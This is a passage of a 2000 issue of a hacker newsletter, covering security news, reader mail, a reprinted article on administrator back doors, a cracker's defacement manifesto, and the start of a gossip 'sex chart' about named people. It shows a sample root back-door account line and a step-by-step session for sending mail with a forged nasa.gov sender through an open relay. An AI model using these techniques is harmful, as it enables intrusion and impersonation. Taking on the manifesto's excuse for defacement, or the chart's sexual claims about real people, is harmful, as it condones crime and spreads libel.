Full Story ++ Patch Available for the Recycle Bin Creation Vulnerability Contributed by Slash Microsoft has released a patch that eliminates a security vulnerability in Windows NT 4.0. This hole allows a malicious user to create, delete or modify files in the Recycle Bin of another user who shared the machine. Full Story ++ Behind the Scenes at 'Hackers, Inc.' Contributed by Slash Professional hackers roam Net to keep companies--and data--secure. Full Story ++ The Net’s Dark Side: Protecting Your Privacy May Empower Criminals Contributed by Slash Surfing the Web. You thought you knew how dangerous it could be. But many Americans might be astonished at how easy it is to uncover the most sensitive personal information. Full Story ++ RSA Security's Industry-Leading Encryption Technology Offered in OpenSite AuctionNow and OpenSite Dynamic Pricing Toolkit Contributed by Slash Full Story ++ Essential Security for DSL and Cable Modem Users Contributed by Slash Zone Labs, Inc., today announced the immediate availability of the new ZoneAlarm 2.0 Internet security utility. full Story ++ F-Secure, Hewlett Packard team up in WAP security Contributed by Slash Finnish computer security company F-Secure said on Thursday it would develop security for Internet-enabled Wireless Application Protocol (WAP) full Story ++ Experts Warn of Web Surfing Risk Contributed by Slash Computer experts are warning of a serious new Internet security threat that allows hackers to launch malicious programs on a victim's computer Full Story ++ Teen Hacker's Home Raided (Business Tuesday) http://www.wired.com/news/business/0,1367,33889,00.html?tw=wn20000126 The home of the 16-year-old hacker who launched three major lawsuits was raided Monday in Norway, and the international hacking community is reeling from the news. By Lynn Burke. ++ Echelon 'Proof' Discovered (Politics 3:00 a.m. PST) http://www.wired.com/news/politics/0,1283,33891,00.html?tw=wn20000126 NSA documents refer to 'Echelon.' Is it the suspected international citizen spying machine or the name of a legal military project? The researcher who found them thinks it's the latter. By Chris Oakes. ++ Vodafone Gets Its Mannesmann (Business 6:00 a.m. PST) http://www.wired.com/news/business/0,1367,34077,00.html?tw=wn20000203 The three-month-long hostile bid by Britain's telecom giant is finally about to end ... in a friendly takeover. ++ VA Linux Snaps Up Andover (Business 6:50 a.m. PST) http://www.wired.com/news/business/0,1367,34076,00.html?tw=wn20000203 The Linux software distributor pays an estimated $850 million in stocks and cash for the network of tech-info sites, which includes the esteemed Slashdot. ++ Thumbs Down on Net Wiretaps (Politics 3:00 a.m. PST) http://www.wired.com/news/politics/0,1283,34055,00.html?tw=wn20000203 The controversy about Internet wiretaps -- which pitted the FBI and the FCC against the ACLU and the EFF -- has ended with a recommendation against online surveillance. Declan McCullagh reports from Washington. ++ Copy-Protected CDs Taken Back (Technology 3:00 a.m. PST) http://www.wired.com/news/technology/0,1282,33921,00.html?tw=wn20000203 BMG Germany pulls the plug on its first effort to protect CDs from piracy after customers complain that some of the music is unplayable. By Chris Oakes. ++ Moveable Media: Stick or Card? (Technology 3:00 a.m. PST) http://www.wired.com/news/technology/0,1282,34052,00.html?tw=wn20000203 A new industry consortium thinks it has the portable answer to secure storage of music and more: a secure digital memory card. Microsoft signed on Wednesday. Look out, Sony Memory Stick. ++ Net Tax May Get the Heave-Ho (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34075,00.html?tw=wn20000203 It's a matter of changing one sentence in existing legislation. But if Congress approves, the threat of Internet taxation could vanish forever. Or at least for Washington's idea of forever. Declan McCullagh reports from Washington. ++ Class-Action Suit Calls on AOL (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34063,00.html?tw=wn20000203 A lawsuit alleges America Online's newest software disconnects users from competing online accounts. The filing requests $8 billion in damages for version 5.0 users. ++ RealNetworks Helps Pay Piper (Technology Wednesday) http://www.wired.com/news/technology/0,1282,34026,00.html?tw=wn20000203 The Net's streaming media giant adds technology from AudioSoft to facilitate royalty payments to copyright holders. The system will count streams and send the data to the collecting agency. By Christopher Jones. ++ Virtual Training for Real Jobs (Culture Wednesday) http://www.wired.com/news/culture/0,1284,33897,00.html?tw=wn20000203 Technology may be the cornerstone of the new economy, but people lacking skills are being shut out of the market. One Texas program is trying to get them into the game. Katie Dean reports from Austin, Texas. ++ But, How to Pronounce Dot EU? (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34045,00.html?tw=wn20000203 The European Commission, wanting a piece of the dot com pie, launches an initiative to give businesses on the other side of the pond a uniform suffix. -=- Security Portal News Shorts -=- ++ Trend Micro Virus Alerts: TROJ_FELIZ and W97M_ARMAGID.A - a Windows executable and Word macro virus respectively, both are low risk viruses, not believed to be widespread ++ ComputerWorld: Y2K gives some admins a security education - The threat of online assaults had IT staffs on guard, but midnight came and went without any serious security problems cropping up, according to experts monitoring systems ++ ZDNet: Script virus looks to ring in new year - The first virus to get its own press release in the year 2000 appears to be little more than a nuisance. Meanwhile, pirate-killer Trojan.Kill also quiet ++ Jan 1, 2000 Symantec: PWSteal.Trojan Virus - PWSteal.Trojan is a trojan which attempts to steal login names and passwords. These passwords are often sent to an anonymous email address CNN: CA warns of Y2K-triggered virus - CA said the "Trojan.Kill_Inst98" virus will delete all the files on an infected PC's C: drive when the system clock rolls over to Jan. 1, 2000 ++ Dec 31, 1999 NAI: Zelu Virus - This is an MS-DOS executable which can destroy data on the hard drive. The original filename as received to AVERT is Y2K.EXE and is 24,944 bytes in size. If this file is run, it simulates checking the system for Y2K compliancy. It is not however doing any such thing - it is trashing files on the local system rendering the machine inoperable. Not believed to be widespread. ++ CNN: CA warns of Y2K-triggered virus - CA said the "Trojan.Kill_Inst98" virus will delete all the files on an infected PC's C: drive when the system clock rolls over to Jan. 1, 2000 Y2K Status Update - no news is good news ++ Sophos Virus Alert: WM97/Chantal-B - WM97/Chantal-B is a Word macro virus which drops a batch file virus and a Visual Basic script trojan horse. On the 31st of any month the virus displays the Microsoft Office assistant with the message: "Y2K is Coming Soon". If the year is 2000 the virus attempts to delete all files in the current directory and in the root directory of the C: drive Sophos Virus Alert: WM97/BackHand-A - If the date is Friday the 13th the virus password protects the document with the password "Trim(Two)". Then, if the year is 2000, it resets the computer's date to 1/1/1980 ++ CERT: Estimate of the Threat Posed by Y2K-Related Viruses - About a dozen Y2K-related viruses have been reported, but they are not widespread. Moreover, because viruses have to be executed to operate and because most people will not be at their keyboards as the date rolls over, the likelihood of a significant virus event is low. As people return to work next week, the virus risk may increase somewhat for all types of viruses, but there is no reason to expect a major outbreak. NAI Virus listing: ExploreZip.C or Minizip III - This is another variant of the original W32/ExploreZip.worm distributed earlier in 1999. This version is different in that it is "localized" with Spanish error messages however will function on English Windows systems. This edition was compressed using another compression tool. Not currently rated as a high risk threat ++ Dec 30, 1999 ZDNet: Apple's OS 9 patch brings new problems - Although many users were impressed by Apple's quick reaction this week to the discovery of a potential security flaw in Mac OS 9, those users who have applied the new OT Tuner 1.0 patch are reporting loss of all network connectivity or crashes during startup. Apple says patched machines simply need to be restarted ++ Sun Security Bulletin 192: CDE and OpenWindows - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4, 5.3), and SunOS 4.1.4, and 4.1.3_U1 which relate to various vulnerabilities in CDE and OpenWindows Sun Security Bulletin 191 sadmind - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, and 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability with sadmind Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ======================================================================== The message board is DEAD it was an experiment that failed. Perhaps i'll revive a board when I can run some good board software on our own host. Don't be shy with your email, we do get mail, just not much of it directed to other readers/the general readership. I'd really like to see a 'readers mail' section. Send in questions on security, hacking IDS, general tech questions or observations etc, hell we've even printed poetry in the past when we thought it was good enough to share.. - Ed ======================================================================= Seen on security focus: To: Security Jobs Subject: Virus coder wanted Date: Thu Jan 27 2000 00:18:44 Author: Drissel, James W. Message-ID: Computer Sciences Corporation in San Antonio, TX is looking for a good virus coder. Applicants must be willing to work at Kelly AFB in San Antonio. Other exploit experience is helpful. Send Resumes/questions to james.drissel@cmet.af.mil -=- From: To: Sent: Wednesday, January 05, 2000 1:02 AM Subject: Just some comments Hello staff of HWA, Just thought i would tell u guys that u r doin a pimp ass job and if its alright i would like to put a link up on my webpage to this interesting and informative site. Mail me back plez. Pyr0-phreak@geeks404.com www.crosswinds.net/~pyr0phreak -=- From: Andrew Nutter-Upham To: Sent: Sunday, January 02, 2000 9:42 PM Subject: about your site. I love the newsletter, read every edition. but your site sucks. now i don't blame you, a lot of people have problems with good site design. I do web design as a part time job, and I'd like (just to be nice, for money of course.) to redo the site, if that's ok with you, I could leach the site down, but i think it'd be easier if you could just zip it up and send it to me. if you like my revisions feel free to keep them. if not, that's ok too, i just thought that I'd put in the offer. Think it over. thanks for listening. -andy It sure does suck, its getting pretty shoddy and out dated looking, a tad ragged around the edges, i've done some minor patch-up mods to make things better but don't have time to work on it in a major way, perhaps we can get something going here... - Ed -=- From: Lascarmaster To: Sent: Monday, January 24, 2000 1:58 AM Subject: [ AD! ] Hello CRUCIPHUX, hello from France my site is a french hacker portal with some good links and news for hackers ( in french i prefer the word lascar ) by the way , if you could place this ad on your next hwa.hax0r digest, it could be very nice try my site at http://lascars.cjb.net ______________________________________________________________ French Hackers' Portal / Le Portail Des Lascars Francophones Links and News of interest / Liens et news pour lascars. ;-) -------------------------------------------------------------- ->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<- ______________________________________________________________ Le portail des Lascars c'est http://Lascars.cjb.net Lascarmaster mailto:Lascars@iquebec.com ______________________________________________________________________________ Si votre email etait sur iFrance vous pourriez ecouter ce message au tel ! http://www.ifrance.com : ne laissez plus vos emails loins de vous ... gratuit sur i France : emails (20 MO, POP, FAX), Agenda, Site perso -=- From: Dragos Ruiu To: Sent: Tuesday, January 25, 2000 9:50 PM Subject: kyxspam: IMxploits in the news (First reported in Salon huh.?... Bay Area tunnel vision is an interesting phenomenon. Has anyone made the definitive IM vulnerability and exploit page yet? As in I'M owned. --dr :-) Hack Takes Aim at AOL Clients Wired News Report 5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report. The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts. "We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL. AOL's online service is used to changed passwords, so hackers are easily able to open new accounts using the existing AIM user's name. People who subscribe to AOL are not affected by the breach. People who use instant messaging software (AIM) outside of AOL, are. D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action." "Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said. He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number." David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process. "AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected." "AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks." -- kyx.net we're from the future - home of kanga-foo! -=- From: Dragos Ruiu To: Sent: Tuesday, January 25, 2000 10:32 PM Subject: kyxspam: hacking for politics. http://news.cnet.com/news/0-1005-200-1531134.html?tag=st.ne.ron.lthd.1005-2 00-1531134 Hackers attack Japanese government sites By Reuters Special to CNET News.com January 25, 2000, 11:40 a.m. PT TOKYO--Japanese officials suffered an embarrassment today when hackers penetrated two government Web sites, leaving a message in one of them criticizing the Japanese government's position on the 1937 Nanjing Massacre. Computer systems at Japan's Management and Coordination Agency were raided yesterday, and its home page was replaced with derogatory messages insulting the Japanese in the first-ever hacking of the country's government computer system. The hackers left a message on the Web site in Chinese blasting the Japanese government for refusing to acknowledge that the Nanjing Massacre took place, media reports said. Jiji news agency said it had deciphered the message, which originally came in garbled, to read: "The Chinese people must speak up to protest the Japanese government for refusing to acknowledge the historical misdeed of the 1937 Nanjing Massacre." Hundreds and thousand of civilians were massacred by Imperial Army troops during the 1937-38 occupation of the central Chinese city. A meeting by ultrarightist Japanese in Osaka last weekend to whitewash the incident, also called the Rape of Nanking, has whipped up new anger in China, where hundreds marched through the streets of Nanjing to denounce the conference. The Chinese government lodged protests about the gathering. But the Japanese government, which acknowledges that the incident was no fabrication as some ultrarightists claim, failed to bar the group from holding the weekend meeting. A similar hacking incident occurred on Japan's Science and Technology Agency's home page. Agency officials declined to give details of the messages but said the home page was also replaced with a direct access switch to adult magazine Web sites. Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the hacking incidents, including possible help from Washington, which is more advanced in dealing with hackers. "The government must take all necessary measures including seeking help from the United States," Aoki said at a news conference. Officials said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration. Story Copyright © 2000 Reuters Limited. All rights reserved. -- kyx.net we're from the future - home of kanga-foo! -=- From: Dragos Ruiu To: Sent: Wednesday, January 26, 2000 5:15 PM Subject: kyxspam: who watches the watchmen? (tip o'de hat to rfp's site {wiretrip.net} that had this article link. Luv dem skins... --dr) http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html Who gets your trust? Security breaches can come from those you least suspect Summary Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust? WIZARD'S GUIDE TO SECURITY By Carole Fennelly In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right? Wrong. Their intention did not matter -- the security of the system has been bypassed. This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything. What is a back door? Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security. Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it. In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. It can also be a program set up to invoke system privileges from a nonprivileged account. A simple back door is an account set up in the /etc/passwd file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root: auser:x:0:101:Average User :/home/auser:/bin/ksh If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole. It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent. Back doors can also be set up in subtler ways though SUID 0 programs (which set the userid to root). Usually, the motivation for setting up back doors is one of expediency. The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge. Proprietary data A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data. Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts. In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"? System monitoring Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges. What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it. What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to. Countermeasures You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee. Background checks You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught). The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children. I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area. In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations. What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit? Be honest: would you perform the same background checks regardless of a person's appearance? Technical measures Some technical software packages can limit or control superuser privileges. I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to. sudo The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description. Tripwire Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files. Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column. Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent? Professionalism The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior. During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as: No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator. All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient. Users' files may not be modified or read except in the case of a predetermined problem or security investigation. Be prepared to justify. Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential. The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately. Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing. All administrative procedures and tools are to be considered proprietary information and are the property of the computer center. Tape archives may not be removed from the facility without written approval. Discretion A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it. At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!) Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations. Final thoughts Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street. As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker." The only difference is the label. Disclaimer: The information and software in this article are provided as-is and should be used with caution. Each environment is unique, and readers are cautioned to investigate, with their companies, the feasibility of using the information and software in this article. No warranties, implied or actual, are granted for any use of the information and software in this article, and neither the author nor the publisher is responsible for any damages, either consequential or incidental, with respect to the use of the information and software contained herein. s About the author Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms and of late has focused on sendmail configurations. Carole provides security consultation to several financial institutions in the New York City area. -- kyx.net we're from the future - home of kanga-foo! -=- 02.0 From the editor. ~~~~~~~~~~~~~~~~ _____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_| #include #include #include main() { printf ("Read commented source!\n\n"); /* * Yes we've wavered from our weekly release schedule, sorry * about that, i've been indulging in other projects requiring * more of my time (network IDS related etc) but you will find * pretty much full coverage of the time period Jan 16th to Feb * 12th or so included in this issue. * * I've rearranged stuff a little, i've moved some of the fodder * that i'm sure was annoying some people and definately at * at least one (grin) to the END of the newsletter, into the * appendices where it should probably have been in the first * place. So if you're looking for the gov and mil sites that * have scoured our site or want to check the FAQ or our source * or resource lists etc, they have all been moved to the back * so now you can more or less 'dive in' to the news material * and content without paging thru stuff you may have already * seen a million times. * * Also did a slight modification/clean up of the website, its * going to be redone but meanwhile i've made it a little less * cumbersome and easier to navigate. Also added a toy or two * want a user@hax0r-news.zzn.com mail address? I knew you did * (heh) well now you can, just follow the link and away you * go to yet another web based mail account...sorry appears to * be no forwarding. * * This will include alot of HNN rehashed material, i'm working * on automating the retreival of certain news sources for time * saving in creating these issues, since we have access to * other sources of info that don't get explored as often as * I'd like, also keeping up with exploits is not so difficult * now that packetstorm no longer has the contact base it once * did. If you can suggest sites that get 0-day (grin) or current * exploit code or the sites of the coders themselves, please * send in the url/list info etc so we can keep everyone up to * date. * * I shall finally be asking some help from people, I can no * longer do this by myself to my satisfaction, so I hope to * enlist some eager beavers with time to kill on this project * rather than let release dates drift further and further * apart. * * * Things are a bit messy and not necessarily in chronological * order, I don't like it but thats the way it turned out, I * really need to spend more time on this to get it organized * more neatly and make it more accessible, comments welcome. * * We need more submissions!, if you submit to security NG's or * mailing lists about exploits or security concerns that you * think may be of interest to our readers, consider CC: a copy * to me for inclusion here. I try and cover a broad spectrum * (perhaps too broad) of security/hacker related material and * as such a little help with material would be most appreciated. * * mucho props out to Zym0t1c who is contributing more and more * to the zine lately, thanks dude! * * Cruci * * cruciphux@dok.org * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Anonymous email: telnet (wingate ip) (see our proxies list) Wingate>0.0.0.0 Trying 0.0.0.0... Connected to target.host.edu Escape character is '^]'. 220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST) HELO bogus.com 250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you MAIL FROM: admin@nasa.gov 250 admin@nasa.gov... Sender ok RCPT TO: cruciphux@dok.org 250 cruciphux@dok.org... Recipient ok DATA Secret cool infoz . QUIT If you got that far everything is probably ok, otherwise you might see 550 cruciphux@dok.org... Relaying denied or 550 admin@nasa.gov... Domain must exist etc. * This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, its probably also illegal (theft of service) so, don't do it. ;-) -=- Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= 03.0 Slash, Croatian cracker, speaks out ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is from one of the last defacements that Slash has done, he has since renounced defacing and is starting a new security group called b0f (Buffer Overflow) we'll keep you posted as this develops. - Ed Defaced by slash [ 2.1.2000 ] Original site here (http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com/index-old.html) www.badjura-petri.com - I got some interesting mail in the last few days that I want to share with You. The first one is from a Security Consultant David Hove, who works for a company named "RISCmanagment Inc." (www.riscman.com), and this is what he wrote to me in his mail : ------ Numb Nuts, Your judgments lay upon broken young souls who know no better. Let it be! Hackers will hack regardless of holes previously exploited. If the sys adm does not fix their holes this is not the issue. Hacking for fame is not the issue. You yourself mailed your hack in for recognition did you not. STOP THE HYPOCRISY AND SIMPLY HACK. Who the hell are U to dictate what should be placed on a defaced website? I personally work the other side of the fence specializing in keeping you out but thoroughly enjoy watching you and others like you go about your daily routine. Exploiting port 80, buffer overflows, running your little scripts, ect. Fuck ethics! The harder you try to hack the more aware we become as admins. For those admins who do not keep up Fuckem! David Hove Security Consultant CCSA/CCSE RISCmanagement Inc. www.riscman.com ------- Deer Mr. David, your email made me very sad because I realized that people don't get the message I'm trying to say. Hacking previously hacked sites is considered lame, and yes, hacking for fame is the issue. Hackers now adays hack only to get media attention. In my country a 16 year old Back Orifice user was raided for "hacking" a computer of a Croatian politian. The media made a national hero out of him. In the interview he said that he could hack into a bank with just two of his friends and a good computer. Now, people who read that newspaper bought the story, but people who know young Denis via IRC can confirm that he is a complete idiot an a lamer. His parents are so proud of him, not knowing that anyone can "hack" using Back Orifice. About me mailing my hack to attrition. Yes, I did mail the hack to attrition, you know why !? I deface to spread the message out. I personally think if I just deface the site that people wont notice it. So I report it to attrition and they put a mirror of the site I defaced so other people can view it too. I don't do it for the fame. I could hack under a different name everytime, but this is my style. I don't got braging on IRC "I hacked this..", "I hacked that..". I don't have to prove my skillz to anyone. People can respect me or hate me. I sincerely doubt that defacing a site will make me look better infront of my friends. Almost anyone can find himself a remote exploit and run it against the server. But not anyone can secure a Unix server, program or even make html. For me defacing is just expressing my opinion on stuff, nothing more. About 'fuck the ethics' thing. Mr. David, the ethics are here to prevent a major chaos. Without ethics people would just go around and delete anything they run into. I suggest every hacker to stick to the ethics as close as he can, hell, that's why they were written. I know people forget about them, but there are always people like me to remind hackers about the ethics. That's the balance. People don't stick to them, they life stupid messages like "I 0wn3 j00". I tell You people, that's bad. Can't You just write something. Anything, just not these stupid irritating messages. Ok, we started another discussion here. "Who the hell are U to dictate what should be placed on a defaced website?" - You say. Well, Your right. I'm nobody. I can't dictate what should be placed on a defaced website. But I can suggest people not to do it. I just suggested it, I didn't dictate or order it. "The harder you try to hack the more aware we become as admins." - Aware ?! If I deface Your site ten times, and don't tell You how I got in, You become more aware !? I damage Your company for 10.000 $ by defacing it, because people say: "How can they secure my server when they can't even secure their own." And nobody wants Your service anymore. Don't get me wrong. I'm sure You're a very good and experienced administrator, but nothing is secure enough, that hackers can't brake it. That's what we devoted Our lives to, penetrating systems. I enjoy hacking. That is really something unique. People through ages have always wanted to do something that's forbidden or illegal. Just remind Yourself of Adam & Eve, and the Heaven garden. Eve had to eat that apple alldo God gave them everything they needed, and just forbid them to eat apples from that tree. Hacking is illegal in many countries. You could get worse sentence for hacking than for murdering someone. I don't really care if I get raided. Hacking is my crime. A crime out of passion. Respect me or hate me, the choice is Yours. - Peace out, slash - Shoutouts - p4riah, LogError, zanith, v00d00, PHC, THC, attrition.org, net-security.org, ex1t, sAs72, Cruciphux, HWA.hax0r.news, BHZ, SiRiUs, sLina, kLick_Mi, Emptyhead, mosthated, pr1sm ,fuqraq, airWalk, [Princev], zeroeffect, and the whole BLN. - Peace to my man whitecee, keep Youre head up. Peace to everyone who gave support via email or IRC. I wish You a happy and a bug-free New Year. Links... - Attrition.org: Keep up the good work fellows - HelpNet Security: The best news site on the net - Black Lava Network: BLN for life !!! Copyright © slash Penetrating systems since 1998 @HWA 04.0 The hacker sex chart 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~ This was to be included in the last issue but attrition was down (only source I know of that carries it) so here it is in its glory. *********** WARNING: Explicit content ************************************** slander & libel -- the official computer scene sexchart "that's none of your business!" version 9.04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - for updates, additions, or to be put on the sexchart mailing list, mail crank@ice.net. to receive the latest version on efnet irc, "/msg lifelike sexchart". a link is denoted by any sexual action between computer users that is capable of spreading an std, from wet kissing on up. the last .05 of revisions is listed at the bottom. since the chart has grown so much, it's been extended in a strange way. to preserve the 78 column width, there is now a secondary chart beneath the first. people whose names appear between asterisks (*) in the first chart also exist in the second. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - .--------- turin -------------------------------------. | .----' | ||`---------------------------. | toby | | |`----- keeper | | .-|------|-|--------|---|-- intro -------|---------|------------. | | .----|-|----- bjoe | | | | | .-----|-|-|----|-|------------|-- brat acidqueene | | | .---|-|-|----|-|------------|----|-----------|------|--|-----. | | | | | | | `--. | | shorty | | | | | angst | | | .--|-- reality ---|----|--|------ weedboy | | | | || |`--|-|-|-|--|--------------|----|--|--------|------|--|-----|----. | || `---|-|-|-' | | | | .------' | | | | | || .---|-|-|----|-- morgaine | | | | DJTrax | | | | | || | | | |.---|------|-------|-- lucky | | | llama | | | || | | | || | .-- thal ----' .----|-|--' potter | | | | | |`-|-- oodles --|-|------------ styx 